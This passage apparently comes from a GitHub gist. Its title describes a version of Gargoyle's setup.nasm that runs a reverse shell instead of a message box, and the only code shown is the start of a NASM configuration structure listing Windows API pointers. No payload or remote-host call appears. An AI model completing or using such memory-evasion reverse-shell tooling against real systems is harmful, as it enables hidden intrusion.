Skip to content

Instantly share code, notes, and snippets.

@adon90
adon90 / setup.nasm
Last active May 18, 2018 09:56
Gargoyle setup.nasm to execute a reverse shell instead of messagebox
BITS 32
STRUC Configuration
.initialized: RESD 1
.setup_addr: RESD 1
.setup_length: RESD 1
.VirtualProtectEx: RESD 1
.WaitForSingleObjectEx: RESD 1
.CreateWaitableTimer: RESD 1
.SetWaitableTimer: RESD 1